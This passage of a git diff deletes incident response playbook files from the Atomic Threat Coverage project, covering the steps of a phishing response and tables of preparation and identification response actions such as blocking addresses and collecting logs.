-Start monitoring for authentification attempts and all potentially harmful actions from (potentially) compromised accounts.  
-Look for anomalies, unusual network connections, unusual geolocation/time of work, actions that were never executed before.  
-Keep in touch with the real users and, in case of need, ask them if they executing some suspicious actions by themselves or not.  
-
-##### List hosts communicated with an external domain
-
-
-List hosts communicated with an external domain using the most efficient way.  
-
-##### List hosts communicated with an external IP address
-
-
-List hosts communicated with an external IP address using the most efficient way.  
-
-##### List hosts communicated with an external URL
-
-
-List hosts communicated with an external URL using the most efficient way.  
-##### List users that have opened am email message
-
-
-List users who opened/read a particular email message using the Email Server's functionality.  
-
-##### Collect an email message
-
-Collect an email message using the most appropriate option:  
-
-- Email Team/Email server: if there is such option  
-- The person that reported the attack (if it wasn't detected automatically or reported by victims)  
-- Victims: if they reported the attack  
-- Following the local computer forensic evidence collection procedure, if the situation requires it
-
-Ask for the email in `.EML` format. Instructions:  
-
-  1. Drug and drop email from Email client to Desktop  
-  2. Archive with password "infected" and send to IR specialists by email  
-
-##### List receivers of a particular email message
-
-
-List receivers of a particular email message using the Email Server's functionality.  
-##### Make sure that an email message is a phishing attack
-
-Check an email and its metadata for evidences of phishing attack:  
-
-- **Impersonalisation attempts**: sender is trying to identify himself as somebody he is not  
-- **Suspicious askings or offers**: download "invoice", click on link with something important etc  
-- **Psychological manipulations**: invoking a sense of urgency or fear is a common phishing tactic  
-- **Spelling mistakes**: legitimate messages usually don't have spelling mistakes or poor grammar  
-
-Explore references of the article to make yourself familiar with phishing attacks history and examples.  
-
-##### Extract observables from an email message
-
-Extract the data for further response steps:  
-
-- attachments (using munpack tool: `munpack email.eml`)  
-- from, to, cc  
-- subject of the email  
-- received servers path  
-- list of URLs from the text content of the mail body and attachments  
-
-This Response Action could be automated with [TheHive EmlParser](https://blog.thehive-project.org/2018/07/31/emlparser-a-new-cortex-analyzer-for-eml-files/).  
-
-#### Containment
-
-##### Block an external IP address from being accessed by corporate assets
-
-
-Block an external IP address from being accessed by corporate assets, using the most efficient way.  
-
-Warning:  
-
-- Be careful blocking IP addresses. Make sure it's not a cloud provider or a hoster. If you would like to block something that is hosted on a well-known cloud provider or on a big hoster IP address, you should block (if applicable) a specific URL using alternative Response Action   
-
-##### Block an external domain name from being accessed by corporate assets
-
-
-Block an external domain name from being accessed by corporate assets, using the most efficient way.  
-
-Warning:  
-
-- Be careful blocking doman names. Make sure it's not a cloud provider or a hoster. If you would like to block something that is hosted on a well-known cloud provider or on a big hoster doman, you should block (if applicable) a specific URL using alternative Response Action   
-
-##### Block an external URL from being accessed by corporate assets
-
-
-Block an external URL from being accessed by corporate assets, using the most efficient way.  
-
-##### Block a domain name on an Email server
-
-Block a domain name on an Email Server using its native filtering functionality.  
-
-##### Block an email sender on the Email-server
-
-
-Block an email sender on an Email Server using its native filtering functionality.  
-
-##### Quarantine an email message
-
-
-Quarantine an email message on an Email Server using its native functionality.  
-
-#### Eradication
-
-##### Report incident to external companies
-
-Report incident to external security companites, i.e. [National Computer Security Incident Response Teams (CSIRTs)](https://www.sei.cmu.edu/education-outreach/computer-security-incident-response-teams/national-csirts/).  
-Provide all Indicators of Compromise and Indicators of Attack that have been observed.  
-
-A phishing attack could be reported to:  
-
-1. [National Computer Security Incident Response Teams (CSIRTs)](https://www.sei.cmu.edu/education-outreach/computer-security-incident-response-teams/national-csirts/)  
-2. [U.S. government-operated website](http://www.us-cert.gov/nav/report_phishing.html)  
-3. [Anti-Phishing Working Group (APWG)](http://antiphishing.org/report-phishing/)  
-4. [Google Safe Browsing](https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en)  
-5. [The FBI's Intenet Crime Complaint Center (IC3)](https://www.ic3.gov/default.aspx)  
-
-This Response Action could be automated with [TheHive and MISP integration](https://blog.thehive-project.org/2017/06/19/thehive-cortex-and-misp-how-they-all-fit-together/).  
-
-##### Delete an email message from an Email Server and users' email boxes
-
-Delete an email message from an Email Server and users' email boxes using its native functionality.
-
-#### Recovery
-
-##### Unblock a blocked IP address
-
-
-Unblock a blocked IP address in the system(s) used to block it.  
-
-##### Unblock a blocked domain name
-
-
-Unblock a blocked domain name in the system(s) used to block it.  
-
-##### Unblock a blocked URL
-
-
-Unblock a blocked URL in the system(s) used to block it.  
-
-##### Unblock a domain on email
-
-
-Unblock an email domain on an Email Server using its native functionality.  
-
-##### Unblock a sender on email
-
-
-Unblock an email sender on an Email Server using its native functionality.  
-
-##### Restore a quarantined email message
-
-
-Restore a quarantined email message on an Email Server using its native functionality.  
-
-#### Lessons learned
-
-##### Develop the incident report
-
-Develop the Incident Report using your corporate template.  
-
-It should include:  
-
-1. Executive Summary with a short description of damage, actions taken, root cause, and key metrics (Time To Detect, Time To Respond, Time To Recover etc)  
-2. Detailed timeline of adversary actions mapped to [ATT&CK tactics](https://attack.mitre.org/tactics/enterprise/) (you can use the [Kill Chain](https://en.wikipedia.org/wiki/Kill_chain), but most probably most of the actions will be in Actions On Objective stage, which is not very representative and useful)  
-3. Detailed timeline of actions taken by Incident Response Team  
-4. Root Cause Analysis and Recommendations for improvements based on its conclusion  
-5. List of specialists involved in Incident Response with their roles  
-
-##### Conduct Lessons Learned exercise
-
-The Lessons Learned phase evaluates the team's performance through each step. 
-The goal of the phase is to discover how to improve the incident response process.  
-You need to answer some basic questions, using developed incident report:  
-
-- What happened?  
-- What did we do well?  
-- What could we have done better?  
-- What will we do differently next time?  
-
-The incident report is the key to improvements.  
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Response_Stages/RS0001.md b/Atomic_Threat_Coverage/Response_Stages/RS0001.md
deleted file mode 100644
index a1479c3..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/RS0001.md
+++ /dev/null
@@ -1,105 +0,0 @@
-# Preparation 
-
-**ID**: RS0001
-
-Get prepared for a security incident.
-## Response Actions
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RA1001](../Response_Actions/RA_1001_practice.md) | [Practice](../Response_Actions/RA_1001_practice.md) | Practice in the real environment. Sharpen Response Actions within your organization |
-| [RA1002](../Response_Actions/RA_1002_take_trainings.md) | [Take trainings](../Response_Actions/RA_1002_take_trainings.md) | Take training courses to gain relevant knowledge |
-| [RA1003](../Response_Actions/RA_1003_raise_personnel_awareness.md) | [Raise personnel awareness](../Response_Actions/RA_1003_raise_personnel_awareness.md) | Raise personnel awareness regarding phishing, ransomware, social engineering,  and other attacks that involve user interaction |
-| [RA1004](../Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md) | [Make personnel report suspicious activity](../Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md) | Make sure that personnel will report suspicious activity i.e. suspicious emails,  links, files, activity on their computers, etc |
-| [RA1005](../Response_Actions/RA_1005_set_up_relevant_data_collection.md) | [Set up relevant data collection](../Response_Actions/RA_1005_set_up_relevant_data_collection.md) | Usually, data collection is managed by Log Management/Security Monitoring/Threat Detection teams.  You need to provide them with a list of data that is critically important for IR process. Most of  the time, data like DNS and DHCP logs are not being collected, as their value for detection is  relatively low. You can refer to the existing Response Actions (Preparation stage) to develop the list |
-| [RA1006](../Response_Actions/RA_1006_set_up_a_centralized_long-term_log_storage.md) | [Set up a centralized long-term log storage](../Response_Actions/RA_1006_set_up_a_centralized_long-term_log_storage.md) | Set up a centralized long-term log storage. This is one of the most critical problems companies have nowadays. Even if there is such a system, in most of the cases it stores irrelevant data or has too small retention period |
-| [RA1007](../Response_Actions/RA_1007_develop_communication_map.md) | [Develop communication map](../Response_Actions/RA_1007_develop_communication_map.md) | Develop a communication map for both internal (C-level, managers and technical specialists from the other departments, that could be involved in IR process) and external communications (law enforcement, national CERTs, subject matter experts that you have lack of, etc) |
-| [RA1008](../Response_Actions/RA_1008_make_sure_there_are_backups.md) | [Make sure there are backups](../Response_Actions/RA_1008_make_sure_there_are_backups.md) | Make sure there are both online and offline backups. Make sure they are fully operational. In the case of a successful ransomware worm attack, thats the only thing that will help you to safe your critically important data |
-| [RA1009](../Response_Actions/RA_1009_get_network_architecture_map.md) | [Get network architecture map](../Response_Actions/RA_1009_get_network_architecture_map.md) | Get network architecture map. Usually, its managed by the Network security team. It will help you to choose the containment strategy, such as isolating specific network segments |
-| [RA1010](../Response_Actions/RA_1010_get_access_control_matrix.md) | [Get access control matrix](../Response_Actions/RA_1010_get_access_control_matrix.md) | Get Access Control Matrix. Usually, its managed by the Network security team. It will help you to identify adversary opportunities, such as laterally movement and so on |
-| [RA1011](../Response_Actions/RA_1011_develop_assets_knowledge_base.md) | [Develop assets knowledge base](../Response_Actions/RA_1011_develop_assets_knowledge_base.md) | Develop assets knowledge base. It will help you to compare observed activity with a normal activity profile for a specific host, user or network segment |
-| [RA1012](../Response_Actions/RA_1012_check_analysis_toolset.md) | [Check analysis toolset](../Response_Actions/RA_1012_check_analysis_toolset.md) | Make sure your toolset for analysis and management is updated and fully operational. Make sure that all the required permissions have been granted as well |
-| [RA1013](../Response_Actions/RA_1013_access_vulnerability_management_system_logs.md) | [Access vulnerability management system logs](../Response_Actions/RA_1013_access_vulnerability_management_system_logs.md) | Access vulnerability management system logs. It will help to identify the vulnerabilities a specific host had at a specific time in the past |
-| [RA1014](../Response_Actions/RA_1014_connect_with_trusted_communities.md) | [Connect with trusted communities](../Response_Actions/RA_1014_connect_with_trusted_communities.md) | Connect with trusted communities for information exchange |
-| [RA1101](../Response_Actions/RA_1101_access_external_network_flow_logs.md) | [Access external network flow logs](../Response_Actions/RA_1101_access_external_network_flow_logs.md) | Make sure you have access to external communication Network Flow logs |
-| [RA1102](../Response_Actions/RA_1102_access_internal_network_flow_logs.md) | [Access internal network flow logs](../Response_Actions/RA_1102_access_internal_network_flow_logs.md) | Make sure you have access to internal communication Network Flow logs |
-| [RA1103](../Response_Actions/RA_1103_access_internal_http_logs.md) | [Access internal HTTP logs](../Response_Actions/RA_1103_access_internal_http_logs.md) | Make sure you have access to internal communication HTTP logs |
-| [RA1104](../Response_Actions/RA_1104_access_external_http_logs.md) | [Access external HTTP logs](../Response_Actions/RA_1104_access_external_http_logs.md) | Make sure you have access to external communication HTTP logs |
-| [RA1105](../Response_Actions/RA_1105_access_internal_dns_logs.md) | [Access internal DNS logs](../Response_Actions/RA_1105_access_internal_dns_logs.md) | Make sure you have access to internal communication DNS logs |
-| [RA1106](../Response_Actions/RA_1106_access_external_dns_logs.md) | [Access external DNS logs](../Response_Actions/RA_1106_access_external_dns_logs.md) | Make sure you have access to external communication DNS logs |
-| [RA1107](../Response_Actions/RA_1107_access_vpn_logs.md) | [Access VPN logs](../Response_Actions/RA_1107_access_vpn_logs.md) | Make sure you have access to VPN logs |
-| [RA1108](../Response_Actions/RA_1108_access_dhcp_logs.md) | [Access DHCP logs](../Response_Actions/RA_1108_access_dhcp_logs.md) | Make sure you have access to DHCP logs |
-| [RA1109](../Response_Actions/RA_1109_access_internal_packet_capture_data.md) | [Access internal packet capture data](../Response_Actions/RA_1109_access_internal_packet_capture_data.md) | Make sure you have access to internal communication Packet Capture data |
-| [RA1110](../Response_Actions/RA_1110_access_external_packet_capture_data.md) | [Access external packet capture data](../Response_Actions/RA_1110_access_external_packet_capture_data.md) | Make sure you have access to external communication Packet Capture data |
-| [RA1111](../Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md) | [Get ability to block external IP address](../Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md) | Make sure you have the ability to block an external IP address from being accessed by corporate assets |
-| [RA1112](../Response_Actions/RA_1112_get_ability_to_block_internal_ip_address.md) | [Get ability to block internal IP address](../Response_Actions/RA_1112_get_ability_to_block_internal_ip_address.md) | Make sure you can block an internal IP address from being accessed by corporate assets |
-| [RA1113](../Response_Actions/RA_1113_get_ability_to_block_external_domain.md) | [Get ability to block external domain](../Response_Actions/RA_1113_get_ability_to_block_external_domain.md) | Make sure you have the ability to block an external domain name from being accessed by corporate assets |
-| [RA1114](../Response_Actions/RA_1114_get_ability_to_block_internal_domain.md) | [Get ability to block internal domain](../Response_Actions/RA_1114_get_ability_to_block_internal_domain.md) | Make sure you can block an internal domain name from being accessed by corporate assets |
-| [RA1115](../Response_Actions/RA_1115_get_ability_to_block_external_url.md) | [Get ability to block external URL](../Response_Actions/RA_1115_get_ability_to_block_external_url.md) | Make sure you have the ability to block an external URL from being accessed by corporate assets |
-| [RA1116](../Response_Actions/RA_1116_get_ability_to_block_internal_url.md) | [Get ability to block internal URL](../Response_Actions/RA_1116_get_ability_to_block_internal_url.md) | Make sure you can block an internal URL from being accessed by corporate assets |
-| [RA1117](../Response_Actions/RA_1117_get_ability_to_block_port_external_communication.md) | [Get ability to block port external communication](../Response_Actions/RA_1117_get_ability_to_block_port_external_communication.md) | Make sure you can block a network port for external communications |
-| [RA1118](../Response_Actions/RA_1118_get_ability_to_block_port_internal_communication.md) | [Get ability to block port internal communication](../Response_Actions/RA_1118_get_ability_to_block_port_internal_communication.md) | Make sure you can block a network port for internal communications |
-| [RA1119](../Response_Actions/RA_1119_get_ability_to_block_user_external_communication.md) | [Get ability to block user external communication](../Response_Actions/RA_1119_get_ability_to_block_user_external_communication.md) | Make sure you can block a user for external communications |
-| [RA1120](../Response_Actions/RA_1120_get_ability_to_block_user_internal_communication.md) | [Get ability to block user internal communication](../Response_Actions/RA_1120_get_ability_to_block_user_internal_communication.md) | Make sure you can block a user for internal communications |
-| [RA1121](../Response_Actions/RA_1121_get_ability_to_find_data_transferred_by_content_pattern.md) | [Get ability to find data transferred by content pattern](../Response_Actions/RA_1121_get_ability_to_find_data_transferred_by_content_pattern.md) | Make sure you have the ability to find data transferred at a particular time in the past by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA1122](../Response_Actions/RA_1122_get_ability_to_block_data_transferring_by_content_pattern.md) | [Get ability to block data transferring by content pattern](../Response_Actions/RA_1122_get_ability_to_block_data_transferring_by_content_pattern.md) | Make sure you have the ability to block data transferring by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA1123](../Response_Actions/RA_1123_get_ability_to_list_data_transferred.md) | [Get ability to list data transferred](../Response_Actions/RA_1123_get_ability_to_list_data_transferred.md) | Make sure you have the ability to list the data that is being transferred at the moment or at a particular time in the past |
-| [RA1124](../Response_Actions/RA_1124_get_ability_to_collect_transferred_data.md) | [Get ability to collect transferred data](../Response_Actions/RA_1124_get_ability_to_collect_transferred_data.md) | Make sure you have the ability to collect the data that is being transferred at the moment or at a particular time in the past |
-| [RA1125](../Response_Actions/RA_1125_get_ability_to_identify_transferred_data.md) | [Get ability to identify transferred data](../Response_Actions/RA_1125_get_ability_to_identify_transferred_data.md) | Make sure you have the ability to identify the data that is being transferred at the moment or at a particular time in the past (i.e. its content, value) |
-| [RA1126](../Response_Actions/RA_1126_find_data_transferred_by_content_pattern.md) | [Find data transferred by content pattern](../Response_Actions/RA_1126_find_data_transferred_by_content_pattern.md) | Make sure you have the ability to find the data that is being transferred at the moment or at a particular time in the past by its content pattern |
-| [RA1201](../Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md) | [Get ability to list users opened email message](../Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md) | Make sure you have the ability to list users who opened a particular email message |
-| [RA1202](../Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md) | [Get ability to list email message receivers](../Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md) | Make sure you have the ability to list receivers of a particular email message |
-| [RA1203](../Response_Actions/RA_1203_get_ability_to_block_email_domain.md) | [Get ability to block email domain](../Response_Actions/RA_1203_get_ability_to_block_email_domain.md) | Make sure you have the ability to block an email domain |
-| [RA1204](../Response_Actions/RA_1204_get_ability_to_block_email_sender.md) | [Get ability to block email sender](../Response_Actions/RA_1204_get_ability_to_block_email_sender.md) | Make sure you have the ability to block an email sender |
-| [RA1205](../Response_Actions/RA_1205_get_ability_to_delete_email_message.md) | [Get ability to delete email message](../Response_Actions/RA_1205_get_ability_to_delete_email_message.md) | Make sure you have the ability to delete an email message |
-| [RA1206](../Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md) | [Get ability to quarantine email message](../Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md) | Make sure you have the ability to quarantine an email message |
-| [RA1207](../Response_Actions/RA_1207_get_ability_to_collect_email_message.md) | [Get ability to collect email message](../Response_Actions/RA_1207_get_ability_to_collect_email_message.md) | Make sure you have the ability to collect an email message |
-| [RA1301](../Response_Actions/RA_1301_get_ability_to_list_files_created.md) | [Get ability to list files created](../Response_Actions/RA_1301_get_ability_to_list_files_created.md) | Make sure you have the ability to list files that have been created at a particular time in the past |
-| [RA1302](../Response_Actions/RA_1302_get_ability_to_list_files_modified.md) | [Get ability to list files modified](../Response_Actions/RA_1302_get_ability_to_list_files_modified.md) | Make sure you have the ability to list files that have been modified at a particular time in the past |
-| [RA1303](../Response_Actions/RA_1303_get_ability_to_list_files_deleted.md) | [Get ability to list files deleted](../Response_Actions/RA_1303_get_ability_to_list_files_deleted.md) | Make sure you have the ability to list files that have been deleted at a particular time in the past |
-| [RA1304](../Response_Actions/RA_1304_get_ability_to_list_files_downloaded.md) | [Get ability to list files downloaded](../Response_Actions/RA_1304_get_ability_to_list_files_downloaded.md) | Make sure you have the ability to list files that have been downloaded from the internet at a particular time in the past |
-| [RA1305](../Response_Actions/RA_1305_get_ability_to_list_files_with_tampered_timestamps.md) | [Get ability to list files with tampered timestamps](../Response_Actions/RA_1305_get_ability_to_list_files_with_tampered_timestamps.md) | Make sure you have the ability to list files with a tampered timestamp |
-| [RA1306](../Response_Actions/RA_1306_get_ability_to_find_file_by_path.md) | [Get ability to find file by path](../Response_Actions/RA_1306_get_ability_to_find_file_by_path.md) | Make sure you have the ability to find a file by its path (including its name) |
-| [RA1307](../Response_Actions/RA_1307_get_ability_to_find_file_by_metadata.md) | [Get ability to find file by metadata](../Response_Actions/RA_1307_get_ability_to_find_file_by_metadata.md) | Make sure you have the ability to find file by its metadata (i.e. signature, permissions, MAC times) |
-| [RA1308](../Response_Actions/RA_1308_get_ability_to_find_file_by_hash.md) | [Get ability to find file by hash](../Response_Actions/RA_1308_get_ability_to_find_file_by_hash.md) | Make sure you have the ability to find a file by its hash |
-| [RA1309](../Response_Actions/RA_1309_get_ability_to_find_file_by_format.md) | [Get ability to find file by format](../Response_Actions/RA_1309_get_ability_to_find_file_by_format.md) | Make sure you have the ability to find a file by its format |
-| [RA1310](../Response_Actions/RA_1310_get_ability_to_find_file_by_content_pattern.md) | [Get ability to find file by content pattern](../Response_Actions/RA_1310_get_ability_to_find_file_by_content_pattern.md) | Make sure you have the ability to find a file by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA1311](../Response_Actions/RA_1311_get_ability_to_collect_file.md) | [Get ability to collect file](../Response_Actions/RA_1311_get_ability_to_collect_file.md) | Make sure you have the ability to collect a specific file from a (remote) host or a system |
-| [RA1312](../Response_Actions/RA_1312_get_ability_to_quarantine_file_by_path.md) | [Get ability to quarantine file by path](../Response_Actions/RA_1312_get_ability_to_quarantine_file_by_path.md) | Make sure you have the ability to block a file from being accessed by its path (including its name) |
-| [RA1313](../Response_Actions/RA_1313_get_ability_to_quarantine_file_by_hash.md) | [Get ability to quarantine file by hash](../Response_Actions/RA_1313_get_ability_to_quarantine_file_by_hash.md) | Make sure you have the ability to block a file from being accessed by its hash |
-| [RA1314](../Response_Actions/RA_1314_get_ability_to_quarantine_file_by_format.md) | [Get ability to quarantine file by format](../Response_Actions/RA_1314_get_ability_to_quarantine_file_by_format.md) | Make sure you have the ability to block a file from being accessed by its format |
-| [RA1315](../Response_Actions/RA_1315_get_ability_to_quarantine_file_by_content_pattern.md) | [Get ability to quarantine file by content pattern](../Response_Actions/RA_1315_get_ability_to_quarantine_file_by_content_pattern.md) | Make sure you have the ability to block a file from being accessed by its content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA1316](../Response_Actions/RA_1316_get_ability_to_remove_file.md) | [Get ability to remove file](../Response_Actions/RA_1316_get_ability_to_remove_file.md) | Make sure you have the ability to remove a specific file from a (remote) host or a system |
-| [RA1317](../Response_Actions/RA_1317_get_ability_to_analyse_file_hash.md) | [Get ability to analyse file hash](../Response_Actions/RA_1317_get_ability_to_analyse_file_hash.md) | Make sure you have the ability to analyse a file hash |
-| [RA1318](../Response_Actions/RA_1318_get_ability_to_analyse_windows_pe.md) | [Get ability to analyse Windows PE](../Response_Actions/RA_1318_get_ability_to_analyse_windows_pe.md) | Make sure you have the ability to analyse a Windows Portable Executable file |
-| [RA1319](../Response_Actions/RA_1319_get_ability_to_analyse_macos_macho.md) | [Get ability to analyse macos macho](../Response_Actions/RA_1319_get_ability_to_analyse_macos_macho.md) | Make sure you have the ability to analyse a macOS Mach-O file |
-| [RA1320](../Response_Actions/RA_1320_get_ability_to_analyse_unix_elf.md) | [Get ability to analyse Unix ELF](../Response_Actions/RA_1320_get_ability_to_analyse_unix_elf.md) | Make sure you have the ability to analyse a UNIX ELF file |
-| [RA1321](../Response_Actions/RA_1321_get_ability_to_analyse_ms_office_file.md) | [Get ability to analyse MS office file](../Response_Actions/RA_1321_get_ability_to_analyse_ms_office_file.md) | Make sure you have the ability to analyse a Microsoft Office file |
-| [RA1322](../Response_Actions/RA_1322_get_ability_to_analyse_pdf_file.md) | [Get ability to analyse PDF file](../Response_Actions/RA_1322_get_ability_to_analyse_pdf_file.md) | Make sure you have the ability to analyse a PDF file |
-| [RA1323](../Response_Actions/RA_1323_get_ability_to_analyse_script.md) | [Get ability to analyse script](../Response_Actions/RA_1323_get_ability_to_analyse_script.md) | Make sure you have the ability to analyse a script file (i.e. Python, PowerShell, Bash scripts etc) |
-| [RA1401](../Response_Actions/RA_1401_get_ability_to_list_processes_executed.md) | [Get ability to list processes executed](../Response_Actions/RA_1401_get_ability_to_list_processes_executed.md) | Make sure you have the ability to list processes being executed at the moment or at a particular time in the past |
-| [RA1402](../Response_Actions/RA_1402_get_ability_to_find_process_by_executable_path.md) | [Get ability to find process by executable path](../Response_Actions/RA_1402_get_ability_to_find_process_by_executable_path.md) | Make sure you have the ability to find process executed at a particular time in the past by its executable path (including its name) |
-| [RA1403](../Response_Actions/RA_1403_get_ability_to_find_process_by_executable_metadata.md) | [Get ability to find process by executable metadata](../Response_Actions/RA_1403_get_ability_to_find_process_by_executable_metadata.md) | Make sure you have the ability to find process executed at a particular time in the past by its executable metadata (i.e. signature, permissions, MAC times) |
-| [RA1404](../Response_Actions/RA_1404_get_ability_to_find_process_by_executable_hash.md) | [Get ability to find process by executable hash](../Response_Actions/RA_1404_get_ability_to_find_process_by_executable_hash.md) | Make sure you have the ability to find process executed at a particular time in the past by its executable hash |
-| [RA1405](../Response_Actions/RA_1405_get_ability_to_find_process_by_executable_format.md) | [Get ability to find process by executable format](../Response_Actions/RA_1405_get_ability_to_find_process_by_executable_format.md) | Make sure you have the ability to find process executed at a particular time in the past by its executable format |
-| [RA1406](../Response_Actions/RA_1406_get_ability_to_find_process_by_executable_content_pattern.md) | [Get ability to find process by executable content pattern](../Response_Actions/RA_1406_get_ability_to_find_process_by_executable_content_pattern.md) | Make sure you have the ability to find process executed at a particular time in the past by its executable content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA1407](../Response_Actions/RA_1407_get_ability_to_block_process_by_executable_path.md) | [Get ability to block process by executable path](../Response_Actions/RA_1407_get_ability_to_block_process_by_executable_path.md) | Make sure you have the ability to block process by its executable path (including its name) |
-| [RA1408](../Response_Actions/RA_1408_get_ability_to_block_process_by_executable_metadata.md) | [Get ability to block process by executable metadata](../Response_Actions/RA_1408_get_ability_to_block_process_by_executable_metadata.md) | Make sure you have the ability to block process by its executable metadata (i.e. signature, permissions, MAC times) |
-| [RA1409](../Response_Actions/RA_1409_get_ability_to_block_process_by_executable_hash.md) | [Get ability to block process by executable hash](../Response_Actions/RA_1409_get_ability_to_block_process_by_executable_hash.md) | Make sure you have the ability to block process by its executable hash |
-| [RA1410](../Response_Actions/RA_1410_get_ability_to_block_process_by_executable_format.md) | [Get ability to block process by executable format](../Response_Actions/RA_1410_get_ability_to_block_process_by_executable_format.md) | Make sure you have the ability to block process by its executable format |
-| [RA1411](../Response_Actions/RA_1411_get_ability_to_block_process_by_executable_content_pattern.md) | [Get ability to block process by executable content pattern](../Response_Actions/RA_1411_get_ability_to_block_process_by_executable_content_pattern.md) | Make sure you have the ability to block process by its executable content pattern (i.e. specific string, keyword, binary pattern etc) |
-| [RA1501](../Response_Actions/RA_1501_manage_remote_computer_management_system_policies.md) | [Manage remote computer management system policies](../Response_Actions/RA_1501_manage_remote_computer_management_system_policies.md) | Make sure you can manage Remote Computer Management system policies |
-| [RA1502](../Response_Actions/RA_1502_get_ability_to_list_registry_keys_modified.md) | [Get ability to list registry keys modified](../Response_Actions/RA_1502_get_ability_to_list_registry_keys_modified.md) | Make sure you have the ability to list registry keys modified at a particular time in the past |
-| [RA1503](../Response_Actions/RA_1503_get_ability_to_list_registry_keys_deleted.md) | [Get ability to list registry keys deleted](../Response_Actions/RA_1503_get_ability_to_list_registry_keys_deleted.md) | Make sure you have the ability to list registry keys deleted at a particular time in the past |
-| [RA1504](../Response_Actions/RA_1504_get_ability_to_list_registry_keys_accessed.md) | [Get ability to list registry keys accessed](../Response_Actions/RA_1504_get_ability_to_list_registry_keys_accessed.md) | Make sure you have the ability to list registry keys accessed at a particular time in the past |
-| [RA1505](../Response_Actions/RA_1505_get_ability_to_list_registry_keys_created.md) | [Get ability to list registry keys created](../Response_Actions/RA_1505_get_ability_to_list_registry_keys_created.md) | Make sure you have the ability to list registry keys created at a particular time in the past |
-| [RA1506](../Response_Actions/RA_1506_get_ability_to_list_services_created.md) | [Get ability to list services created](../Response_Actions/RA_1506_get_ability_to_list_services_created.md) | Make sure you have the ability to list services that have created at a particular time in the past |
-| [RA1507](../Response_Actions/RA_1507_get_ability_to_list_services_modified.md) | [Get ability to list services modified](../Response_Actions/RA_1507_get_ability_to_list_services_modified.md) | Make sure you have the ability to list services that have been modified at a particular time in the past |
-| [RA1508](../Response_Actions/RA_1508_get_ability_to_list_services_deleted.md) | [Get ability to list services deleted](../Response_Actions/RA_1508_get_ability_to_list_services_deleted.md) | Make sure you have the ability to list services that have been deleted at a particular time in the past |
-| [RA1509](../Response_Actions/RA_1509_get_ability_to_remove_registry_key.md) | [Get ability to remove registry key](../Response_Actions/RA_1509_get_ability_to_remove_registry_key.md) | Make sure you have the ability to remove a registry key |
-| [RA1510](../Response_Actions/RA_1510_get_ability_to_remove_service.md) | [Get ability to remove service](../Response_Actions/RA_1510_get_ability_to_remove_service.md) | Make sure you have the ability to remove a service |
-| [RA1601](../Response_Actions/RA_1601_manage_identity_management_system.md) | [Manage identity management system](../Response_Actions/RA_1601_manage_identity_management_system.md) | Make sure you can manage Identity Management System, i.e. remove/block users, revoke credentials, and execute other Response Actions |
-| [RA1602](../Response_Actions/RA_1602_get_ability_to_lock_user_account.md) | [Get ability to lock user account](../Response_Actions/RA_1602_get_ability_to_lock_user_account.md) | Make sure you have the ability to lock user account from being used |
-| [RA1603](../Response_Actions/RA_1603_get_ability_to_list_users_authenticated.md) | [Get ability to list users authenticated](../Response_Actions/RA_1603_get_ability_to_list_users_authenticated.md) | Make sure you have the ability to list users authenticated at a particular time in the past on a particular system |
-| [RA1604](../Response_Actions/RA_1604_get_ability_to_revoke_authentication_credentials.md) | [Get ability to revoke authentication credentials](../Response_Actions/RA_1604_get_ability_to_revoke_authentication_credentials.md) | Make sure you have the ability to revoke authentication credentials |
-| [RA1605](../Response_Actions/RA_1605_get_ability_to_remove_user_account.md) | [Get ability to remove user account](../Response_Actions/RA_1605_get_ability_to_remove_user_account.md) | Make sure you have the ability to remove a user account |
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Stages/RS0002.md b/Atomic_Threat_Coverage/Response_Stages/RS0002.md
deleted file mode 100644
index 9f4f11d..0000000
--- a/Atomic_Threat_Coverage/Response_Stages/RS0002.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# Identification 
-
-**ID**: RS0002
-
-Gather information about a threat that has triggered a security incident, its TTPs, and affected assets.
-## Response Actions
-
-| ID    | Name     | Description |
-|:-----:|:--------:|-------------|
-| [RA2001](../Response_Actions/RA_2001_list_victims_of_security_alert.md) | [List victims of security alert](../Response_Actions/RA_2001_list_victims_of_security_alert.md) | List victims of a security alert |
-| [RA2002](../Response_Actions/RA_2002_list_host_vulnerabilities.md) | [List host vulnerabilities](../Response_Actions/RA_2002_list_host_vulnerabilities.md) | Get information about a specific host existing vulnerabilities, or about vulnerabilities it had at a particular time in the past |
-| [RA2003](../Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md) | [Put compromised accounts on monitoring](../Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md) | Put (potentially) compromised accounts on monitoring |
-| [RA2101](../Response_Actions/RA_2101_list_hosts_communicated_with_internal_domain.md) | [List hosts communicated with internal domain](../Response_Actions/RA_2101_list_hosts_communicated_with_internal_domain.md) | List hosts communicated with an internal domain |
-| [RA2102](../Response_Actions/RA_2102_list_hosts_communicated_with_internal_ip.md) | [List hosts communicated with internal IP](../Response_Actions/RA_2102_list_hosts_communicated_with_internal_ip.md) | List hosts communicated with an internal IP address |
-| [RA2103](../Response_Actions/RA_2103_list_hosts_communicated_with_internal_url.md) | [List hosts communicated with internal URL](../Response_Actions/RA_2103_list_hosts_communicated_with_internal_url.md) | List hosts communicated with an internal URL |
-| [RA2104](../Response_Actions/RA_2104_analyse_domain_name.md) | [Analyse domain name](../Response_Actions/RA_2104_analyse_domain_name.md) | Analyse a domain name |
-| [RA2105](../Response_Actions/RA_2105_analyse_ip.md) | [Analyse IP](../Response_Actions/RA_2105_analyse_ip.md) | Analyse an IP address |
